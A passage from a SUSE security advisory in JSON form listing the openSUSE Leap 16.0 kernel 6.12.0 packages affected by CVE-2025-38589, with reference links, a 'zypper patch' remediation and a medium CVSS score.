"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38589",
"url": "https://www.suse.com/security/cve/CVE-2025-38589"
},
{
"category": "external",
"summary": "SUSE Bug 1248366 for CVE-2025-38589",
"url": "https://bugzilla.suse.com/1248366"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
